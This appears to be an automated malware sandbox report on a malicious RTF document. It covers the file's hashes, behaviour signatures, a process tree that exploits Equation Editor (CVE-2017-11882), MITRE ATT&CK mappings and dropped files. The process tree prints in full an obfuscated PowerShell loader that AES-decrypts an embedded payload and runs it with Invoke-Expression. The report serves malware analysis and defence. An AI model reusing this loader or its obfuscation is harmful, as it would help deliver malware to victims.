Overview

overview

8

Static

static

1

e677d8183d...d3.rtf

windows7-x64

8

e677d8183d...d3.rtf

windows10-2004-x64

1

Analysis

  • max time kernel
    100s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    19-07-2024 07:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e677d8183d89a410a3ce59db5a2722d3.rtf

  • Size

    90KB

  • MD5

    e677d8183d89a410a3ce59db5a2722d3

  • SHA1

    969255020b8e5b9cf16ffa6dd7c8f931e7b68ce7

  • SHA256

    5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2

  • SHA512

    8f7369c3de05953613c246a1312a6ccfb6c416e458ddd55efdfb96c0ef569832aea51a52527fbfd5f7c36e1613c59358c425e5d8cdbf51d5bf4fb63a2bc16cc5

  • SSDEEP

    384:Vgn/TJl/8FdlK+gqigv0C7xAlEM5jUbTMbyi9thdIhFRi2mnk0PKk6Ut6jvWdlKv:YuF22+iM5jZbyShdIjFJu2

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e677d8183d89a410a3ce59db5a2722d3.rtf"
    1⤵
    • Drops file in Windows directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1644
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\butterburnverysweetgirleate.vBS"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2816
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI49958097433743076509724959814142CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIbxuRBZW58D6qHa6OaTz/wPo2erEU3a8XHWrkXAdbdzTC5T84fuiWq58k3i/POU4yNFit1HabT7Ip/uUGVBt4z8Uo7htAUUgjHEN/nsapjY6CPUspvGVUGHssU+Pr5nnVpAZRUrtIGtx098n/onUN4/9UdxjeWta56320IcuEKx5FBRF8BN5agrfzcPl8nWFJaCYbxALQD0pd8wcDcG7Z4qp//WpU8YzhhoHcmfr6tHPpzTEfbrZwiVOvuw+/JvzsrMeYk7zZu+UUshFBQ5tqcmHnYcNcKNeVyySh7vbF4dtVBPC59rcDf45Ip8e8qgnf+f59F72C6X8w7BKmWcxDrvkgIJEdDAL8hj2Jkhtpz0sR4L4aVrWtEQPJ8yxgXf1T2rm+XpdfVfU+ukTx19Jz3wEIAgQSafjf0GfBAL3e4NWDVLet9944vxSiJB8xEd7JenGiyEOtI3Y3hprPXCw66eWQhoF3a145gY3Z2R4BogKZJ5gqp0EKkBqBT9JxAuN4bfZO+TSndIjmga9njg4/qNNYfeYV/uMRKhd+jYkkLNLrx6xGX9qi7fRuFbBprznkr12YuC7yJFQ2x0WsaX8X99Ti2tR/xVNE4EhJ7YWvD7ep2zjQ2woL0IBVZZWRC5I63PpIH400MNDUg8N135wf5JXMORFTBbnzE6SBNiXK6moSaSigUyIRhCN3MyxeECsYo51cbZ/6yqA6VLl9UwtSXFZkT6jsXN4VfMfanH4oR0pi+fnhBmdC+kor0H1eu3doM8tnX5jwkbA3g5RpVHVTwpCCiK/Odz2S8a2CmmJm46STR0hWNzn3oQo1Kld1xQ+1H8hCRSAJvVgqx0wbyv5ng74HSF/sOKduVg5TOulc0bAM2XZNa3NBd2k22BRcCPbE8qhywR0mDi7halZQFXAg8MkRAO0IpVULqcOhikrF+vgmdDw5nxwkSQghmqNulszxeC3Zk9uOC9fO9U2Om796d5NxN0o1Pe2Q7NqhzvPLHu7e5uzSTM6IOxVwRS1jI2X4kkSFKPx5pphUxpLEKB7kQwodoqK5/vSNq9DQIjN4kBA2oWI4BLdmL0+z+59rwTBW487/tVZMEyOa07ecYQeUh66aUseTs5+7zOjmEKrPtKQvkMDJnbAJKX385iV8MzoKGDBarEeSHT3Juol3DEq2A8RWkZdNDTL9gnFsG8rzPUewwTYqHynUuMh5CvZ/ZY0xv/HckoVxNKNGiY5Lzzih8SGOjMqMrXQPiaM+gvZbG3wf2VQkwyAEOH5p54L4m5O5omGT+jAdZzINuqShbK3l0wnwvp/1xtT8MQUezvxMnbqY70jjYLzsmxU+mqfUDhefKjgph7AlvQ909Z5XJmZnneYUGHW/2eWRp9MDZ+jWBNcUhGoUshHAdJ9QTrZSjBiXRG6ahqVSqrmyPd9m1isTmsd2uwpnR/Vv3sDR0Rpa6wRvf3FwwoHMJu7X9zC+Tub3ZCRtEYLoN5hNYt4Ci5ibCNjKAfPWHRBkhpXGJ4vxdNdesz33k4eAkMZFnBRlmUTdq+SY9gKxwq+9Pt2oCH8n9g9JSH93H57AAoPSteAmN+kM8YADHtLsjfKI1n/gboID0K3ci8Im+jLfaq/isIkAQtaFeepycXL9kn3HexD3NbJAn6fY0OQ8fIAKm2bi+W0vdvcXgrjypy+pLfd9B7bUz22aDOxkoZTFdRt1nVGbdgC2CCcFMLqM+ONKbDKmg2i1b2PUwPHKEMYrCPj33PxTJx0uYF6FcTqZWr1FunIOIXGkRF6YnlxA91J0qtZED4hJCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
          3⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:600

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Exploitation for Client Execution

    1
    T1203

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0E1IWGZ4\paste1[1].txt
      Filesize

      156B

      MD5

      ad6c37ef980373e9bcbd14810fad34bc

      SHA1

      9c061a1b3608b7c7f1db7cd06c8246913ee11bda

      SHA256

      ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c

      SHA512

      30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      19KB

      MD5

      738d5c97694a93b817cb45a8e6e20264

      SHA1

      471751e0f3c5841ec2b01dec13883c269f6530b3

      SHA256

      cb0930eadf347431ceb1d357b9a9736932106e8031185532860bf836b6d5074e

      SHA512

      2487aa8e595ab153c229c8fcbce531a8639d4054136a1a543a2983804ef2a004e0301ac7af15e1a8b6aa85568174073abbb1a2ec0a2a6310fe851da0266e2273

      Download Submit
    • C:\Users\Admin\AppData\Roaming\butterburnverysweetgirleate.vBS
      Filesize

      123KB

      MD5

      612b79418bc9dee5e9bf503df55a245c

      SHA1

      8211185d8e6f152a269325a6cb30c361fcbb60b3

      SHA256

      154365daa42baad94fe2c6de17859212e407767de8f9e8e12c69b9623b63a7a0

      SHA512

      05ef1aebdd3b9f2255f7d198c18d498e5b021f89444a8679a84fc6d01e61720e1af7216444231aff52ea3811fb12715f1ac556dd7347346f9a2c12eb27a5fb02

      Download Submit
    • memory/2220-0-0x000000002F991000-0x000000002F992000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2220-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2220-2-0x000000007118D000-0x0000000071198000-memory.dmp
      Filesize

      44KB

      Download
    • memory/2220-39-0x000000007118D000-0x0000000071198000-memory.dmp
      Filesize

      44KB

      Download
    • memory/2220-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download